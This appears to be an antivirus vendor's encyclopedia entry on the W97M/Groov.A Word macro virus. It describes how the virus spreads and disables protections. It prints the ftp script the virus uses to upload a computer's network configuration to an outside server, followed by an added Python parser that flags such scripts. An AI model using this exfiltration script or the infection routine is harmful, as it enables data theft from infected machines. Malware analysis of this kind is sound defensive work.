Threat Encyclopedia

W97M/Groov.A

W97M/Groov.A is a macro virus that operates in the Microsoft Word 97 SR-1 environment. It infects active documents and the global template normal.dot. This macro virus is capable of spreading independently of the global template by means of the file data.dot.
After an infected document is opened, the virus disables the Word anti-virus protection and suppresses the warning windows that are normally displayed when the global template is written to and when macros are converted. It then determines whether it was activated from the global template, from an ordinary document or from the file data.dot, and whether these potential sources of activation have already been infected.
If the virus was activated from an ordinary document, it exports its code to the file c:\groovie.sys and tries to infect the global template. It then stores the file from which it was activated under the name data.dot in the directory that the internal Word variable Application.StartupPath points to (typically %windir%\application data\microsoft\word\startup). Files in this directory are always opened when Word is run, which means that W97M/Groov.A does not depend on the global template in order to spread.
If the virus was activated from the global template and a document is open, it infects the document and adds the text "ALT-F11 says it's groovie!" as a comment to its summary. Then it creates the file data.dot in the way described above.
If the virus was activated from the file data.dot, it tries to infect the global template and the active document, and adds the text "ALT-F11 says it's groovie!" to the document's summary.
The virus deletes the items Tools/Macro and Tools/Templates and Add-Ins from the Word menu, making them inaccessible.
With a 20% chance, the virus triggers its payload, which is directed against the anti-virus program producer F-PROT. The virus creates the file c:\script.sys with the following contents:

anonymous
replikator@B.com
cd incoming
send
c:\ip.txt
228.B
quit

Later the virus uses this file as an ftp script to send the file c:\ip.txt, which it created by means of the program ipconfig.exe, a standard part of the Windows operating system. The file c:\ip.txt contains the IP configuration of the infected computer (e.g. its IP addresses, gateways and DNS servers) and data on the installed network cards. The virus sends this file to the server complex.is.
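
The following Python code is an added illustration, not part of the original entry and not the vendor's code. It reads a script such as c:\script.sys in the order ftp consumes it, which shows why the lines appear as they do: login answers first, then commands, with the arguments of a bare "send" taken from the next two lines. It assumes the server name is given on the ftp command line, so the first two lines answer the login prompts; the function names are hypothetical.

```python
# Added example: triage of an ftp script file such as c:\script.sys.
# Assumption: the server is named on the ftp command line, so script lines
# 1 and 2 answer the "User" and "Password" prompts.

UPLOAD_CMDS = {"send", "put"}  # ftp treats these two commands as synonyms

# Constructed sample: the script contents as listed in the description above.
SAMPLE_SCRIPT = r"""anonymous
replikator@B.com
cd incoming
send
c:\ip.txt
228.B
quit
"""

def parse_ftp_script(text):
    """Return the login, directory changes and uploads found in the script."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    result = {"user": None, "password": None, "cwd": [], "uploads": []}
    if len(lines) >= 2:
        result["user"], result["password"] = lines[0], lines[1]
    i = 2
    while i < len(lines):
        parts = lines[i].split()
        cmd, args = parts[0].lower(), parts[1:]
        i += 1
        if cmd == "cd" and args:
            result["cwd"].append(args[0])
        elif cmd in UPLOAD_CMDS:
            if not args:
                # A bare send/put prompts for "Local file" and "Remote file";
                # the script answers those prompts with its next two lines.
                args = lines[i:i + 2]
                i += len(args)
            if args:
                # With a single argument the remote name equals the local one.
                remote = args[1] if len(args) > 1 else args[0]
                result["uploads"].append((args[0], remote))
    return result

def findings(parsed):
    """List the traits that mark the script as an unattended upload."""
    out = []
    if (parsed["user"] or "").lower() in ("anonymous", "ftp"):
        out.append("anonymous login")
    for local, remote in parsed["uploads"]:
        out.append(f"uploads {local} as {remote}")
    return out
```

For the script above, the result shows an anonymous login, a change to the directory incoming, and c:\ip.txt uploaded under the remote name 228.B.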
W97M/Groov.A infects documents when they are opened, closed or saved, when Word is exited, or when the document is printed.
When the user attempts to view the macro code, the following window is displayed:

© 1992-2004 Eset s.r.o. All rights reserved. No part of this Encyclopedia may be reproduced, transmitted or used in any other way in any form or by any means without the prior permission.